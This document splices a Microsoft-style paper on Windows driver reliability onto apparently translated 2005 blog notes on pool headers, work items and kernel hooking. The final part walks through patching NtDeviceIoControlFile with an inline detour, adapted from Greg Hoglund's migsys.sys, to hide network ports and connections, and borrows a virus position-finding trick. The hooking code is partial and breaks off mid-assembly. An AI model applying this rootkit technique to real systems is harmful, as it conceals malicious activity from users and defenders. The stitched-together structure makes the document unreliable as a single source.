For a normal create or open request on a storage volume, the I/O Manager typically attempts to mount a file system, if none is already mounted. When performing a direct device open, however, the I/O Manager does not mount or send requests through a file system. Instead, it sends the IRP_MJ_CREATE request directly to the storage stack, bypassing any file system that has been mounted for the volume. Requests for further operations (such as read, write, or DeviceIoControl) on the file handle are sent to the topmost device object in the storage stack for the volume.

The I/O Manager performs a direct device open only when the caller requests limited access to the device, such as the access required to read device attributes. This type of open operation occurs rarely, but is useful when an application wants to query certain attributes of a storage volume without forcing a file system to be mounted.

If an application later sends an open request that is relative to a handle on which the I/O Manager performed a direct device open, the file system stack receives a file object in which the RelatedFileObject field points to an object that the file system has not previously seen. To determine whether the I/O Manager performed a direct device open on a file object, a file system driver can test the FO_DIRECT_DEVICE_OPEN flag in the Flags field of the file object.

On Microsoft Windows NT 4.0 and earlier versions of Windows NT, relative open requests for direct device open handles failed. This problem has been corrected in Microsoft Windows 2000 and later releases.

Extended Attributes

Drivers must validate the size and contents of extended attributes (EAs). EAs are used primarily by TDI drivers during open operations. The redirector (RDR) also uses them to hold user names and passwords for accessing network shares.

The I/O Manager copies and parses EAs to make sure they have the correct format: a keyword (a NULL-terminated, variable-length character string), followed by its value (0 to 65535 bytes). Drivers should not assume, however, that if the keyword is correct the value block contains exactly the data they expect. Even if the keyword is correct, the data size might be too small, thus causing the expected data structure to extend beyond the allocated end of buffer, or to contain garbage.

For example, the following code does not properly validate that the size of the value block is sizeof(PVOID).

ea = (PFILE_FULL_EA_INFORMATION)
      Irp->AssociatedIrp.SystemBuffer;

RtlCopyMemory (
           &connection->Context,
           &ea->EaName[ea->EaNameLength+1],
           sizeof (PVOID));
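
For the copy shown above, a size check could look like the following sketch. It is written as user-mode C against a simplified model of the FILE_FULL_EA_INFORMATION layout (a 32-bit next-entry offset, flags, name length, value length, then the name, a NUL, and the value). The names demo_ea and demo_copy_context, and the buffer_bytes parameter that carries the size of the system buffer, are assumptions for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified model of the extended-attribute entry layout. */
typedef struct {
    uint32_t next_entry_offset;
    uint8_t  flags;
    uint8_t  name_length;       /* excludes the terminating NUL */
    uint16_t value_length;
    char     name[];            /* name, NUL, then the value bytes */
} demo_ea;

/* Copies a pointer-sized value out of the entry only if it is really there. */
bool demo_copy_context(const demo_ea *ea, size_t buffer_bytes, void **context)
{
    size_t value_offset;

    if (buffer_bytes < offsetof(demo_ea, name))
        return false;           /* the header itself is truncated */

    value_offset = offsetof(demo_ea, name) + ea->name_length + 1u;
    if (ea->value_length != sizeof(*context))
        return false;           /* value is not exactly one pointer in size */
    if (value_offset > buffer_bytes ||
        buffer_bytes - value_offset < ea->value_length)
        return false;           /* value would run past the end of the buffer */

    memcpy(context, (const unsigned char *)ea + value_offset, sizeof(*context));
    return true;
}
```

The copy happens only after the declared value length and the real buffer size have both been checked, so a short or oversized value is rejected instead of being read as a pointer.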

Drivers also must validate the data within EAs. The following code fails to perform this validation.

ea = OPEN_REQUEST_EA_INFORMATION(Request);
if (ea == NULL) {
    return STATUS_NONEXISTENT_EA_ENTRY;
   }

name = (PTRANSPORT_ADDRESS)&ea->EaName[ea->EaNameLength+1];
AddressName = (PTA_ADDRESS)&name->Address[0];

for (i=0;i<name->TAAddressCount;i++)
...

If the address count is large, the for loop could run beyond the end of the allocated buffer. The driver should check the minimum size of the value, and check each individual address to make sure it is within the buffer.

During internal review, Microsoft found the following error in several drivers that process EAs.

FILE_FULL_EA_INFORMATION UNALIGNED *
FindEA(
    PFILE_FULL_EA_INFORMATION    pStartEA,
    CHAR                        *pTargetName,
    USHORT                       TargetNameLength)
{
    FILE_FULL_EA_INFORMATION UNALIGNED *pCurrentEA;

    do
    {
        Found = TRUE;
        pCurrentEA = pStartEA;
        pStartEA  += pCurrentEA->NextEntryOffset;
...

This code should cast pStartEA to a PUCHAR before adding NextEntryOffset, so that the pointer advances by a byte count instead of by multiples of sizeof (FILE_FULL_EA_INFORMATION).
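
The byte-wise traversal can be sketched in user-mode C as follows. This is a minimal illustration, not the drivers' actual fix: count_ea_entries and EA_HEADER_SIZE are hypothetical names, and the only field assumed is a 32-bit NextEntryOffset at the start of each entry, with 0 marking the last entry.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed size of the fixed part of each entry (illustrative value). */
#define EA_HEADER_SIZE 8u

/* Hypothetical helper: walks a chain of entries by BYTE offsets.
   Returns the number of entries, or -1 if the chain is malformed. */
int count_ea_entries(const uint8_t *buffer, size_t buffer_len)
{
    size_t offset = 0;
    int count = 0;

    for (;;) {
        uint32_t next;

        /* The fixed header of the current entry must fit in the buffer. */
        if (buffer_len - offset < EA_HEADER_SIZE)
            return -1;

        memcpy(&next, buffer + offset, sizeof next);
        count++;

        if (next == 0)
            return count;           /* last entry in the chain */

        /* Reject offsets that overlap the header or leave the buffer. */
        if (next < EA_HEADER_SIZE || next > buffer_len - offset)
            return -1;

        offset += next;             /* advance by bytes, not by struct size */
    }
}
```

Because offset is a byte index into a uint8_t buffer, the addition has the same effect as casting pStartEA to PUCHAR in the driver code.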

Driver Unload Routines

Before unloading, drivers must release all driver-allocated resources, cancel all timers, ensure that no deferred procedure calls (DPCs) are queued, and ensure that all driver-created threads have terminated. The operating system frees a driver’s address space soon after unloading the driver. Thereafter, attempting to execute any driver code, for example, in a DPC or driver-created thread, can result in a system crash.

This section outlines the steps that drivers should take to prevent such errors when using the following:

  • Work items
  • Driver-created threads
  • Timers
  • Queued DPCs
  • IoCompletion routines

Work Items

Drivers that use work items should call the IoAllocateWorkItem, IoQueueWorkItem, and IoFreeWorkItem routines instead of the obsolete ExQueueWorkItem and related routines. The newer IoXxxWorkItem routines include unload protection that the obsolete routines did not have.

The IoXxxWorkItem routines ensure that the device object associated with the work item remains available until the callback routine returns. Work item callback routines can set an event immediately before exiting, without risk that the driver will be unloaded before the callback routine returns. After the event is signaled, the driver can call IoFreeWorkItem and free any resources shared with the work item.

The obsolete ExQueueWorkItem and related routines did not have this protection mechanism.

Note   The number of threads in which to run work items is limited. Drivers should allocate work items only when needed, and free them as soon as they are no longer required. A driver should not wait until it is unloaded to free work items that are no longer in use.

Driver-Created Threads

Many drivers have separate threads of execution that are created outside the control of the worker thread manager. These threads execute code within a loaded driver. Because a driver’s address space is freed soon after its Unload routine returns, every driver must carefully synchronize the termination of these driver threads. Attempting to execute instructions in a driver thread after the driver is unloaded can cause a system crash.

In the following example, the driver waits on an event that another driver thread will set just before exiting.

KeWaitForSingleObject(
                &Device->UnloadEvent,
                Executive,
                KernelMode,
                FALSE,
                (PLARGE_INTEGER)NULL
                );
return;

The following code sets the event.

KeSetEvent(&Device->UnloadEvent,
           IO_NETWORK_INCREMENT,
           FALSE);
return;

If the driver unloads before the final few instructions execute, a fault may occur. In this example, the system could crash if the driver has already been unloaded when the return statement following the call to KeSetEvent is executed.

To prevent this error, drivers that create separate threads should wait on the thread object itself, instead of waiting on an event set by the thread. For example, if a driver calls PsCreateSystemThread to create a thread, the driver can obtain a pointer to the thread object from the returned thread handle (by calling ObReferenceObjectByHandle) and pass that pointer to KeWaitForSingleObject as the object on which to wait. When the thread calls PsTerminateSystemThread, or returns from its thread routine back to the system, the wait is satisfied. The driver can then dereference the thread object and safely unload because the thread has exited.

Timers

Drivers that use timers must also unload carefully. Drivers must cancel any timers that are queued, wait for any CustomTimerDpc routines that are running, and synchronize access to driver structures from DPC routines.

A driver can cancel a one-shot timer in its Unload routine. To cancel a one-shot timer, the driver calls KeCancelTimer. If KeCancelTimer returns TRUE, the timer was still queued and has been canceled, so its DPC will not run. If KeCancelTimer returns FALSE, the timer has already expired and its DPC might be queued or currently running, so the driver must not free any driver-allocated resources until after the DPC has finished running.

The operating system forces any DPCs that are already running to run to completion, even after the driver Unload routine returns (but before deleting the driver’s address space). A driver can therefore wait on an event signaled by the DPC. The DPC should signal the event after it has finished accessing any resources, typically immediately before returning. When the event wait is satisfied, the driver can safely free those resources and unload.

Drivers that use periodic timers must take an additional step. The driver first calls KeCancelTimer to disable the periodic timer. KeCancelTimer always returns TRUE for such timers, however, because as soon as a periodic timer expires, the operating system queues another such timer; consequently, periodic timers always appear to be queued.

To make sure that any DPCs for a periodic timer have completed, a driver must also call KeFlushQueuedDpcs. KeFlushQueuedDpcs returns after all queued DPCs on all processors have run. Although this routine is expensive in terms of performance, a driver must call it in this situation.

Queued DPCs

Before unloading a driver, the operating system flushes driver-queued DPCs other than those for periodic timers, as described in the preceding section. Therefore, drivers that queue DPCs are not required to call KeFlushQueuedDpcs before unloading; however, such drivers must synchronize access to ensure that the DPC routine has finished using resources before the driver frees them. A driver can use the same kind of event wait mechanism described for one-shot timers.

IoCompletion Routines

In rare cases, an IoCompletion routine can run in parallel with a driver’s Unload routine. If the Unload routine waits for an event set by the IoCompletion routine, the event could be satisfied and the driver unloaded before the IoCompletion routine runs to completion. This is a problem only for drivers that do not use Plug and Play.

To avoid this problem, drivers for Windows XP and later can use the IoSetCompletionRoutineEx routine to set the IoCompletion routine. IoSetCompletionRoutineEx protects the IoCompletion routine from driver unload.

Pageable Drivers and DPCs

Drivers that queue DPCs and make themselves pageable are not required to flush DPCs before calling MmPageEntireDriver. The operating system flushes DPCs before paging the driver, but the driver must ensure that neither it nor another thread queues any additional DPCs until the driver is once again locked in memory.

User-Mode APIs

This section describes errors that can occur when drivers are called by the following user-mode APIs.

  • NtReadFile and NtWriteFile
  • TransmitFile

NtReadFile and NtWriteFile

Drivers that read and write data in response to the user-mode APIs NtReadFile and NtWriteFile must be able to handle the negative file offsets that can be passed with these APIs. The I/O Manager performs limited checks on these offsets.

NtWriteFile accepts negative LARGE_INTEGER values to signify a write to end of file and a write to current position. NtReadFile accepts a negative offset, which indicates the current position read. No other negative offsets are accepted.

The I/O Manager does not reject transfers where the offset plus the transfer length cause the offset of the buffer end to wrap from positive to negative.
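
A driver-side check for these cases might look like the sketch below. It is written as portable user-mode C for illustration. The two special values are an assumption based on the DDK constants FILE_WRITE_TO_END_OF_FILE and FILE_USE_FILE_POINTER_POSITION combined with a HighPart of -1, which gives -1 and -2 as 64-bit values. transfer_range_is_valid is a hypothetical helper name.

```c
#include <stdint.h>

/* Assumed 64-bit forms of the special offsets (see the lead-in). */
#define OFFSET_WRITE_TO_EOF       ((int64_t)-1)
#define OFFSET_USE_FILE_POSITION  ((int64_t)-2)

/* Hypothetical helper: returns 1 if the (offset, length) pair is acceptable,
   0 if the offset is an unexpected negative value or offset + length would
   wrap past the largest positive 64-bit offset. */
int transfer_range_is_valid(int64_t offset, uint32_t length, int is_write)
{
    /* "Use the current file position" is meaningful for reads and writes. */
    if (offset == OFFSET_USE_FILE_POSITION)
        return 1;

    /* "Write to end of file" is meaningful only for writes. */
    if (is_write && offset == OFFSET_WRITE_TO_EOF)
        return 1;

    /* Any other negative offset is rejected. */
    if (offset < 0)
        return 0;

    /* Reject ranges whose end would wrap from positive to negative.
       INT64_MAX - offset cannot overflow because offset >= 0 here. */
    if ((uint64_t)length > (uint64_t)(INT64_MAX - offset))
        return 0;

    return 1;
}
```

The overflow test is done by subtraction rather than by computing offset + length, so the check itself never overflows.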

TransmitFile

The Win32 TransmitFile API issues an IOCTL to the system afd.sys driver (AFD) to do fast file copies over the network. The AFD provides support for Windows Sockets API to communicate with underlying transports. During internal testing, Microsoft found several drivers that encountered problems when their handles were passed to the TransmitFile API. Some looped, completing read requests with a success status but with zero bytes read; others had cancellation problems.

The Device Path Exerciser, DevCtl, includes the /w option to test a driver by using TransmitFile. Microsoft recommends testing drivers for these problems.

StartIo Recursion

If many device requests are outstanding, calls to IoStartNextPacket or IoStartNextPacketByKey from a driver’s StartIo routine can result in recursive calls back to the StartIo routine without unwinding the stack.

Drivers that call these routines from the StartIo routine should first call the IoSetStartIoAttributes routine, with the DeferredStartIo parameter set to TRUE. Doing so causes the I/O Manager to keep track of the nesting level of the calls, and dispatch to the StartIo routine only after the current StartIo call has returned.

Passing and Completing IRPs

Drivers commonly have the following problems in passing and completing IRPs:

  • Copying stack locations incorrectly.
  • Returning incorrect status for an IRP that the driver does not handle.
  • Losing IRPs or completing them more than once.
  • Returning incorrect status for an IRP that the driver issues.

Copying Stack Locations Incorrectly

When passing an IRP down the stack, drivers should always use the standard functions IoSkipCurrentIrpStackLocation and IoCopyCurrentIrpStackLocationToNext. Do not write driver-specific code to copy the stack location. Using the standard routines ensures that the driver does not duplicate the IoCompletion routine of a driver layered above it.

For example, the following code can duplicate an IoCompletion routine and cause problems.

currentStack = IoGetCurrentIrpStackLocation (Irp) ;
nextStack = IoGetNextIrpStackLocation (Irp) ;

RtlMoveMemory (nextStack,
               currentStack,
               sizeof (IO_STACK_LOCATION));

Returning Incorrect Status for an IRP That the Driver Does Not Handle

A driver must not return STATUS_SUCCESS for an IRP that it does not handle.

For example, some drivers incorrectly return STATUS_SUCCESS for query IRPs, even though they do not support the required functionality. Doing so can easily crash or corrupt the system, particularly during operations like file name look-ups, if the I/O Manager or another component attempts to use data that was left uninitialized by the Dispatch routine.

Unless otherwise noted in the documentation for a specific IRP, a driver should return STATUS_NOT_SUPPORTED for any IRP it does not handle. Plug-and-Play drivers might also return STATUS_INVALID_DEVICE_REQUEST to indicate that the IRP is inappropriate for the device.

Losing IRPs or Completing Them More Than Once

IRPs that are lost or completed more than once, along with missing calls to I/O Manager routines such as IoStartNextPacket, often occur in error-handling paths. A "lost" IRP is one that the device has finished, but the driver never completed by calling IoCompleteRequest or passing it to another driver.

Quick reviews of code paths can often find such problems. In addition, the DC2 and DevCtl tools can assist in finding lost IRPs. The DC2 and DevCtl tools are provided in the Tools directory of the Windows DDK.

Returning Incorrect Status from an IRP That the Driver Issues

Unlike drivers to which an IRP is forwarded, the driver that issues an IRP must not propagate the SL_PENDING_RETURNED bit in its IoCompletion routine for that IRP. Doing so corrupts the memory pool following the IRP.

When a driver receives an IRP from another driver, its IoCompletion routine must propagate the SL_PENDING_RETURNED bit unless it returns STATUS_MORE_PROCESSING_REQUIRED for the IRP. Therefore, IoCompletion routines for IRPs that are forwarded from another driver typically include the following code.

if (Irp->PendingReturned)
    IoMarkIrpPending(Irp);

The driver that issued the IRP, however, must not include this statement. The issuing driver is the final recipient of the IRP; further processing is not required. When the issuing driver’s IoCompletion routine is called, the DeviceObject parameter is NULL and the I/O stack location points to the location immediately following the end of the IRP, causing corruption of the pool header for the next memory allocation.

Odd-length Unicode Buffers

Some I/O Manager APIs support Unicode input buffers that contain an odd number of bytes. The optional file name in NtQueryDirectoryFile, and many queries using NtQueryInformationFile (such as FileNameInformation), are examples. Drivers should test the lengths of these buffers upon input.
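
A length test of this kind can be as small as the following sketch, written as user-mode C for illustration. unicode_length_is_valid is a hypothetical helper name, and WCHAR16 stands in for the 16-bit WCHAR type. Whether an odd length should be rejected or rounded down is a design choice for the driver. This sketch rejects it.

```c
#include <stddef.h>
#include <stdint.h>

typedef uint16_t WCHAR16;   /* stand-in for the 16-bit WCHAR type */

/* Hypothetical helper: returns 1 if byte_length describes a whole number
   of 16-bit characters and does not exceed the space available. */
int unicode_length_is_valid(size_t byte_length, size_t max_bytes)
{
    if (byte_length > max_bytes)
        return 0;                                   /* would overrun the buffer */
    return (byte_length % sizeof(WCHAR16)) == 0;    /* odd lengths are rejected */
}
```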

Pool Allocation in Low Memory

When the system is low on pool memory, calling ExAllocatePool with the pool type NonPagedPoolMustSucceed causes the system to crash. This can occur, for example, on a web server where client spikes are frequent and short, but the occurrences use a great deal of pool memory and can cause memory to become fragmented temporarily.

Drivers should not use this flag. Instead, drivers should allocate nonpaged memory with the NonPagedPool or NonPagedPoolCacheAligned flags and, if ExAllocatePool returns NULL, return the status STATUS_INSUFFICIENT_RESOURCES.

In addition, Microsoft Windows XP and Windows 2000 drivers must use MmGetSystemAddressForMdlSafe instead of MmGetSystemAddressForMdl. WDM drivers must use MmGetSystemAddressForMdl with the MDL_MAPPING_CAN_FAIL MDL flag, because MmGetSystemAddressForMdlSafe is not supported on Windows 98 and Windows Me.

For more information on pool allocation failures, see Low Pool Memory and Windows XP, available on the Microsoft website.

Call to Action and Resources

Call to Action:

  • Find and correct errors in existing drivers. Use the Driver Verifier, DC2, and DevCtl utilities in the Windows DDK.
  • Analyze code paths, particularly those involving locks, to uncover any problems described in this paper.
  • Always validate pointers obtained from user-mode callers.
  • Always check buffer sizes to prevent buffer overruns and underruns.

Resources:

November 8, 2005
//
//      Caveat Programmer:
//
//              The pool header must be QWORD (8 byte) aligned in size.  If it
//              is not, the pool allocation code will trash the allocated
//              buffer
//
//
//
// The layout of the pool header is:
//
//         31              23         16 15             7            0
//         +----------------------------------------------------------+
//         | Current Size |  PoolType+1 |  Pool Index  |Previous Size |
//         +----------------------------------------------------------+
//         |   ProcessBilled   (NULL if not allocated with quota)     |
//         +----------------------------------------------------------+
//         | Zero or more longwords of pad such that the pool header  |
//         | is on a cache line boundary and the pool body is also    |
//         | on a cache line boundary.                                |
//         +----------------------------------------------------------+
//
//      PoolBody:
//
//         +----------------------------------------------------------+
//         |  Used by allocator, or when free FLINK into sized list   |
//         +----------------------------------------------------------+
//         |  Used by allocator, or when free BLINK into sized list   |
//         +----------------------------------------------------------+
//         ... rest of pool block...
//
//
// N.B. The size fields of the pool header are expressed in units of the
//      smallest pool block size.
//

typedef struct _POOL_HEADER {
    union {
        struct {
            UCHAR PreviousSize;
            UCHAR PoolIndex;
            UCHAR PoolType;
            UCHAR BlockSize;
        };
        ULONG Ulong1;                       // used for InterlockedCompareExchange required by Alpha
    };
#ifdef _WIN64
    ULONG PoolTag;
#endif
    union {
        EPROCESS *ProcessBilled;
#ifndef _WIN64
        ULONG PoolTag;
#endif
        struct {
            USHORT AllocatorBackTraceIndex;
            USHORT PoolTagHash;
        };
    };
} POOL_HEADER, *PPOOL_HEADER;

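So when you need to find the tag of a pool allocation, it is usually in the 4 bytes immediately before the allocated address (on 32-bit systems, where the header is 8 bytes and PoolTag sits at offset +4).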

kd> dt _POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 9 Bits
   +0x000 PoolIndex        : Pos 9, 7 Bits
   +0x002 BlockSize        : Pos 0, 9 Bits
   +0x002 PoolType         : Pos 9, 7 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 ProcessBilled    : Ptr32 _EPROCESS
   +0x004 PoolTag          : Uint4B
   +0x004 AllocatorBackTraceIndex : Uint2B
   +0x006 PoolTagHash      : Uint2B
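
To make the "4 bytes before the allocation" observation concrete, here is a small user-mode sketch. It does not touch real pool memory: POOL_HEADER32 is a simplified stand-in that assumes the 8-byte, 32-bit layout shown in the dt output above, and pool_tag_of and tag_to_string are hypothetical helper names.

```c
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for the 32-bit pool header (assumed 8 bytes). */
typedef struct {
    uint16_t SizeAndIndex;   /* PreviousSize : 9 bits, PoolIndex : 7 bits */
    uint16_t SizeAndType;    /* BlockSize    : 9 bits, PoolType  : 7 bits */
    uint32_t PoolTag;        /* at offset +4, directly before the pool body */
} POOL_HEADER32;

/* Reads the tag stored in the 4 bytes immediately before the allocation. */
uint32_t pool_tag_of(const void *allocation)
{
    uint32_t tag;
    memcpy(&tag, (const uint8_t *)allocation - sizeof tag, sizeof tag);
    return tag;
}

/* Converts a tag to printable text, lowest byte first. */
void tag_to_string(uint32_t tag, char out[5])
{
    int i;
    for (i = 0; i < 4; i++)
        out[i] = (char)((tag >> (8 * i)) & 0xFF);
    out[4] = '\0';
}
```

On 64-bit builds the header in the structure definition above is larger and PoolTag is no longer adjacent to the pool body, so the offset of 4 applies only to the 32-bit layout.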

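November 7, 2005
I came across work items. If a work item is used in place of a thread, there is no extra thread for anyone to find. However, the DDK says that work items are only for short tasks and that long-running ones can cause a deadlock. I tried it, and sure enough a work item that requeues itself in a loop hangs the system, so a work item cannot be treated like a thread that runs forever. That made me think of an asynchronous IRP queue: put the requests that need handling into a queue and use an Event or Semaphore so that each request is processed as it arrives. I am not sure whether a work item that is waiting counts as long-running use. Sigh, I still do not understand how work items really work..
The program below roughly verifies how to use a work item. As for the IRP queue... one step at a time :>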
#include <ntddk.h>
VOID
IoWorkItemRoutine (
				   IN PDEVICE_OBJECT DeviceObject,
				   IN PVOID Context
				   );

PDEVICE_OBJECT	pDeviceObject;
ULONG			i = 0;
PIO_WORKITEM	pIo_WorkItem;
KEVENT			Kevent;

//--------------------------------------------------------------------
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
	//Work items are a limited system resource, and drivers should free
	//them as soon as they are no longer required. For example, drivers
	//should not wait until Unload to free any work items not in use.
	//IoFreeWorkItem(pIo_WorkItem1);
	KeSetEvent(&Kevent,
				IO_NO_INCREMENT,
				FALSE
				);
	IoDeleteDevice(pDeviceObject);
	DbgPrint("My Driver Unloaded!\n");
}
//--------------------------------------------------------------------
NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath )
{
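	NTSTATUS		dwStatus;

	DbgPrint("My Driver Loaded!\n");

	pDriverObject->DriverUnload = OnUnload;

	KeInitializeEvent(&Kevent,
						SynchronizationEvent,
						FALSE
						);
	dwStatus = IoCreateDevice(pDriverObject,
								0,
								NULL,
								FILE_DEVICE_UNKNOWN,
								0,
								FALSE,
								&pDeviceObject
								);
	if (!NT_SUCCESS(dwStatus)){
		// without a device object no work item can be allocated
		return dwStatus;
	}
	pIo_WorkItem = IoAllocateWorkItem(pDeviceObject);
	if (pIo_WorkItem == NULL){
		IoDeleteDevice(pDeviceObject);
		return STATUS_INSUFFICIENT_RESOURCES;
	}
	IoQueueWorkItem(pIo_WorkItem,
					IoWorkItemRoutine,
					DelayedWorkQueue,
					&i
					);

	return STATUS_SUCCESS;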
}
//--------------------------------------------------------------------
VOID
IoWorkItemRoutine (
				   IN PDEVICE_OBJECT DeviceObject,
				   IN PVOID Context
				   )
{
	DbgPrint("in IoWorkItemRoutine %d\n",(*(PULONG)Context)++);
	KeWaitForSingleObject(&Kevent,
							Executive,
							KernelMode,
							FALSE,
							NULL
							);
	if ((*(PULONG)Context)<10){
		IoQueueWorkItem(pIo_WorkItem,
			IoWorkItemRoutine,
			DelayedWorkQueue,
			&i
			);
	}else{
		IoFreeWorkItem(pIo_WorkItem);
	}

}
//--------------------------------------------------------------------
Output:
My Driver Loaded!
in IoWorkItemRoutine 0
My Driver Unloaded!
in IoWorkItemRoutine 1
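After the driver unloads, the work item keeps running. Of course this program has a problem: once the driver is unloaded, the work item just sits there waiting forever, but that’s not the point :> Using a work item does seem workable, and CPU usage stays normal, but a loop does not work, for example: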
VOID
IoWorkItemRoutine (
				   IN PDEVICE_OBJECT DeviceObject,
				   IN PVOID Context
				   )
{
	DbgPrint("in IoWorkItemRoutine %d\n",(*(PULONG)Context)++);
	IoQueueWorkItem(pIo_WorkItem,
			IoWorkItemRoutine,
			DelayedWorkQueue,
			&i
			);
}
//--------------------------------------------------------------------
The output is
in IoWorkItemRoutine 0
in IoWorkItemRoutine 1
in IoWorkItemRoutine 2
and so on without end, and the system stops responding.
 
What the DDK says about work items:
 
Kernel-Mode Driver Architecture: Windows DDK

System Worker Threads

A driver that requires delayed processing can use a work item, which contains a pointer to a driver callback routine that performs the actual processing. The driver queues the work item, and a system worker thread removes the work item from the queue and runs the driver’s callback routine. The system maintains a pool of these system worker threads, which are system threads that each process one work item at a time.

The driver associates a WorkItem callback routine with the work item. When the system worker thread processes the work item, it calls the associated WorkItem routine.

WorkItem routines run in a system thread context. If a driver dispatch routine can run in a user-mode thread context, that routine can queue a work item so that a WorkItem routine performs any operations that require a system thread context.

To use a work item, a driver performs the following steps:

  1. Allocate and initialize a new work item.

    The system uses an IO_WORKITEM structure to hold a work item. To allocate a new IO_WORKITEM structure and initialize it as a work item, the driver can call IoAllocateWorkItem.

  2. Associate a callback routine with the work item, and queue the work item so that it will be processed by a system worker thread.

    To associate a WorkItem routine with the work item and queue the work item, the driver should call IoQueueWorkItem.

  3. Once the work item is no longer required, free it.

    A work item that was allocated by IoAllocateWorkItem should be freed by IoFreeWorkItem.

    The work item can only be freed when the work item is not currently queued. The system dequeues the work item before it calls the work item’s callback routine, so IoFreeWorkItem can be called from within the callback.

Because the pool of system worker threads is a limited resource, WorkItem routines can be used only for operations that take a short period of time. If one of these routines runs for too long (if it contains an indefinite loop, for example), the system can deadlock. Therefore, if a driver requires long periods of delayed processing, it should instead call PsCreateSystemThread to create its own system thread.

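Inline hooks work fairly well in user mode, because multithreading problems rarely come up. The approach is to overwrite the first 5 bytes of the API with a jump to our own function, restore the original 5 bytes inside that function, call the original function, and then write the jump over the first 5 bytes again so that the hook is ready for the next call. The process is roughly as follows.
For example, to hook API() with our function myAPI():
   Overwrite the first 5 bytes of API() with jmp xxxx (pointing to myAPI())      1
        |
        |
   API() is called                                                               2
        |
        |
   Execution jumps to myAPI()                                                    3
        |
        |
   (in myAPI()) restore the original 5 bytes                                     4
        |
        |
   ... some work                                                                 5
        |
        |
   (in myAPI()) call API()                                                       6
        |
        |
   ... some work                                                                 7
        |
        |
   (in myAPI()) overwrite the first 5 bytes of API() with jmp xxxx again         8
        |
        |
   Done                                                                          9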

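This process is much less convenient in the kernel and is very unstable, because system services are called constantly by all of Windows from a great many threads. If one thread calls the hooked system service and is switched out somewhere between steps 4 and 8, another thread that calls the same system service during that window finds it unhooked. And if the thread is interrupted right in the middle of step 4 or step 8, another thread that calls the system service may well cause a BSOD :) Raising the IRQL or blocking other threads is possible, but surely not on every call. I have heard that this kind of hook is very unstable, but I have not tried it myself and do not know how it behaves in practice.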

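Then I came across Greg Hoglund’s migsys.sys, which really is a nice program. Its hook only needs to rewrite the code once and then stays in place, so it is very stable. I tested it in a virtual machine without problems. Of course, if a thread happens to be interrupted during that one rewrite... well, that is just bad luck.
After the driver loads, migsys.c overwrites the first 5 bytes of the system service with a jump to its own hook function. Taking NtDeviceIoControlFile as an example, the hook function is: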

__declspec(naked) my_function_detour_ntdeviceiocontrolfile()
{
    __asm
    {
        // exec missing instructions
        push ebp
            mov  ebp, esp
            push 0x01
            push dword ptr [ebp+0x2C]

            // jump to re-entry location in hooked function
            // this gets 'stamped' with the correct address
            // at runtime.
            //
            // we need to hard-code a far jmp, but the assembler
            // that comes with the DDK will not poop this out
            // for us, so we code it manually
            // jmp FAR 0x08:0xAAAAAAAA
            _emit 0xEA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0xAA
            _emit 0x08
            _emit 0x00
    }
}

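Note the bytes
_emit 0xEA
_emit 0xAA
_emit 0xAA
_emit 0xAA
_emit 0xAA
_emit 0x08
_emit 0x00
These encode a single jump instruction, jmp 0008:AAAAAAAA.
When the driver starts, it searches for AAAAAAAA and overwrites it with the address of NtDeviceIoControlFile+8 in the hooked function. From then on, a call to NtDeviceIoControlFile jumps straight to my_function_detour_ntdeviceiocontrolfile, which executes
push ebp
mov  ebp, esp
push 0x01
push dword ptr [ebp+0x2c]  (8 bytes in total; these instructions may differ between Windows versions)
and then jumps to NtDeviceIoControlFile+8. Because my_function_detour_ntdeviceiocontrolfile is declared __declspec(naked),
the stack is not altered on entry, so the net effect is a complete execution of NtDeviceIoControlFile, except that its first 8 bytes run from a different location :>
Before the push ebp we can do whatever we need directly: no local variables may be used, but we can call functions and process or filter the arguments passed to NtDeviceIoControlFile.
    But to hide ports and connections by hooking NtDeviceIoControlFile, we have to filter the results after the call succeeds, and once we jmp to NtDeviceIoControlFile+8 we have given up control. So execution must come back to our code when the function finishes. Returning requires a call instruction, but call NtDeviceIoControlFile+8 does not work: the pushed return address ends up after the saved ebp on the stack, which scrambles the frame. That approach is a dead end.
    There are surely several ways to do this. So far I have thought of only one, and I would like the compiler to do most of the work so that I can stick to C ;)
The idea is to imitate this pattern: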

NTSTATUS NTAPI myNtDeviceIoControlFile(
                                IN HANDLE FileHandle,
                                IN HANDLE Event OPTIONAL,
                                IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
                                IN PVOID ApcContext OPTIONAL,
                                OUT PIO_STATUS_BLOCK IoStatusBlock,
                                IN ULONG IoControlCode,
                                IN PVOID InputBuffer OPTIONAL,
                                IN ULONG InputBufferLength,
                                OUT PVOID OutputBuffer OPTIONAL,
                                IN ULONG OutputBufferLength
                                )
{
    NTSTATUS rc;
    rc = NtDeviceIoControlFile(
        FileHandle,
        Event,
        ApcRoutine,
        ApcContext,
        IoStatusBlock,
        IoControlCode,
        InputBuffer,
        InputBufferLength,
        OutputBuffer,
        OutputBufferLength
        );
...
}

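We can then operate on the return value, just as if we had called NtDeviceIoControlFile from inside our own function.
NtDeviceIoControlFile takes 10 parameters, so at the time of the call the stack should look like this: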
Arg10
Arg9
Arg8
Arg7
Arg6
Arg5
Arg4
Arg3
Arg2
Arg1
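ret address
Because the arguments were already pushed when the system service was called, our hook function must not set up the frame again on its own: it has to be declared __declspec(naked), with the same parameters as the original function. After entry we simulate
call NtDeviceIoControlFile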

__asm
{
    push OutputBufferLength
    push OutputBuffer
    push InputBufferLength
    push InputBuffer
    push IoControlCode
    push IoStatusBlock
    push ApcContext
    push ApcRoutine
    push Event
    push FileHandle
}

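Next comes the return address, which has to be determined at run time. This uses a position-finding trick that is common in viruses:
    call forwArd
bAck:
    pop eax
    …
forwArd:
    jmp bAck

This yields the address of the pop eax instruction.
In our program: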

__asm
{
    //int 3
    jmp forwArd
bAck:

}

__asm
{
    // exec missing instructions
    push ebp
        mov  ebp, esp
        push 0x01
        push dword ptr [ebp+0x2C]

        // jump to re-entry location in hooked function
        // this gets 'stamped' with the correct address
        // at runtime.
        //
        // we need to hard-code a far jmp, but the assembler
        // that comes with the DDK will not poop this out
        // for us, so we code it manually
        // jmp FAR 0x08:0xAAAAAAAA
        _emit 0xEA
        _emit 0xAA
        _emit 0xAA
        _emit 0xAA
